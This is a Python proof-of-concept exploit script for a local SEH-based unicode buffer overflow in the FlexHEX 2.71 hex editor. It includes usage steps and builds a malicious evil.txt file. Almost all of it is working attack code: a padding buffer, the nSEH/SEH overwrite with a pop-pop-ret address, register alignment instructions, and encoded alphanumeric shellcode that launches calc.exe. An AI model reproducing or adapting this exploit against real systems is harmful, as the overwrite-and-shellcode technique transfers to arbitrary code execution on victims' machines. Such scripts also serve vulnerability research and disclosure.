#!/usr/bin/python -w # # Exploit Author: Chris Au # Exploit Title: FlexHEX 2.71 - Local Buffer Overflow (SEH Unicode) # Date: 06-04-2019 # Vulnerable Software: FlexHEX 2.71 # Vendor Homepage: http://www.flexhex.com # Version: 2.71 # Software Link: http://www.flexhex.com/download/flexhex_setup.exe # Tested Windows Windows XP SP3 # # # PoC # 1. generate evil.txt, copy contents to clipboard # 2. open FlexHEX Editor # 3. select "Stream", click "New Stream..." # 4. paste contents from clipboard in the "Stream Name:" # 5. select OK # 6. calc.exe # filename="evil.txt" junk = "\xcc" * 276 nseh = "\x90\x45" seh = "\xd5\x52" #pop pop retn valign = ( "\x45" #align "\x56" #push esi "\x45" #align "\x58" #pop eax "\x45" #align "\x05\x20\x11" #add eax,11002000 "\x45" #align "\x2d\x1a\x11" #sub eax,11001a00 "\x45" #align "\x50" #push eax "\x45" #align "\xc3" #retn ) #nop to shell nop = "\x45" * 94 #call calc.exe, bufferRegister=EAX shellcode = ( "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI" "AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA" "JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K" "npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq" "foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI" "kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU" "9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K" "zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j" "kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM" "iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c" "Lnc51hOuipAA") fill = "\x45" * 5000 buffer = junk + nseh + seh + valign + nop + shellcode + fill textfile = open(filename , 'w') textfile.write(buffer) textfile.close()